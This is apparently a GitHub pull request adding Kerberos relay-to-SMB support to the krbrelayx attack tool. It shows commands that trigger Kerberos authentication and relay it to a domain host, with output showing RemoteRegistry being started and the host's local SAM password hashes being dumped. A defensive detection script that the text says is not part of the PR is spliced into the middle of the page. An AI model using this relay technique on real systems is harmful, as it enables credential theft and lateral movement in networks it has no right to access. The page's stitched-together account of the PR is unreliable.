Add Kerberos relay support for * -> SMB #46

Merged
merged 1 commit into from
Dec 10, 2024


hugo-syn
Contributor

@hugo-syn hugo-syn commented Dec 2, 2024

Hi @dirkjanm, as discussed, here is my implementation for relaying all protocols to SMB.

First trigger the authentication:

```
$ smbclient.py -dc-ip 10.42.0.5 -target-ip 127.0.0.1 -k -no-pass "DEV.LOCAL/[email protected]"
```

Then relay:

```
$ python3 krbrelayx.py -t smb://bast01.dev.local
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 127.0.0.1
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x156a35f4f55f1455cc86052ac65cbaf9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done dumping SAM hashes for host: bast01.dev.local
[*] Stopping service RemoteRegistry
```

I took the code from impacket for the Kerberos authentication part from an AP_REQ; you can compare it:

I've implemented it for SMB1 and SMB2/3; however, I did not test this against SMBv1.
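A defender-side detection sketch tied to the relay output above, added here and not part of this PR or of krbrelayx: it flags a network logon followed by a short RemoteRegistry start/stop cycle on the same host, the service pattern visible in the SAM dump log. The event records, the host `fs02`, the account names and the IP addresses are constructed, and the flat dict schema for Windows events 4624 and 7036 is an assumption.

```python
from datetime import datetime, timedelta

# Constructed, simplified records (not real logs). Field names follow Windows
# Security 4624 and System 7036 events; the flat dict layout is an assumption.
EVENTS = [
    {"ts": "2024-12-02T10:15:01", "id": 4624, "host": "bast01", "LogonType": 3,
     "TargetUserName": "alice", "IpAddress": "10.42.0.77",
     "AuthenticationPackageName": "Kerberos"},
    {"ts": "2024-12-02T10:15:02", "id": 7036, "host": "bast01",
     "param1": "Remote Registry", "param2": "running"},
    {"ts": "2024-12-02T10:15:09", "id": 7036, "host": "bast01",
     "param1": "Remote Registry", "param2": "stopped"},
    # Benign contrast: an admin session that keeps the service up for 90 minutes.
    {"ts": "2024-12-02T11:00:00", "id": 4624, "host": "fs02", "LogonType": 3,
     "TargetUserName": "bob", "IpAddress": "10.42.0.10",
     "AuthenticationPackageName": "Kerberos"},
    {"ts": "2024-12-02T11:00:05", "id": 7036, "host": "fs02",
     "param1": "Remote Registry", "param2": "running"},
    {"ts": "2024-12-02T12:30:00", "id": 7036, "host": "fs02",
     "param1": "Remote Registry", "param2": "stopped"},
]

def find_remote_registry_bursts(events, logon_window=timedelta(seconds=30),
                                max_runtime=timedelta(seconds=60)):
    """Alert on: network logon, then RemoteRegistry started and stopped quickly."""
    alerts, last_logon, started = [], {}, {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, host = datetime.fromisoformat(ev["ts"]), ev["host"]
        if ev["id"] == 4624 and ev.get("LogonType") == 3:
            last_logon[host] = (ts, ev)          # most recent network logon
        elif ev["id"] == 7036 and ev.get("param1") == "Remote Registry":
            if ev.get("param2") == "running":
                logon = last_logon.get(host)
                # Only track starts that closely follow a network logon.
                if logon and ts - logon[0] <= logon_window:
                    started[host] = (ts, logon[1])
            elif ev.get("param2") == "stopped" and host in started:
                start_ts, logon_ev = started.pop(host)
                if ts - start_ts <= max_runtime:  # short-lived: start, read, stop
                    alerts.append({
                        "host": host,
                        "user": logon_ev["TargetUserName"],
                        "source_ip": logon_ev["IpAddress"],
                        "auth": logon_ev["AuthenticationPackageName"],
                        "runtime_s": int((ts - start_ts).total_seconds()),
                    })
    return alerts

if __name__ == "__main__":
    for alert in find_remote_registry_bursts(EVENTS):
        print(alert)
```

The `source_ip` in each alert is the address to compare against where that account normally logs on from, since a relayed session originates from the relay host rather than the user's workstation.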

@dirkjanm dirkjanm merged commit 4f3de1b into dirkjanm:master Dec 10, 2024
@dirkjanm
Owner

I will need to find some time to test this, but merging it in for now, thanks for the great work!
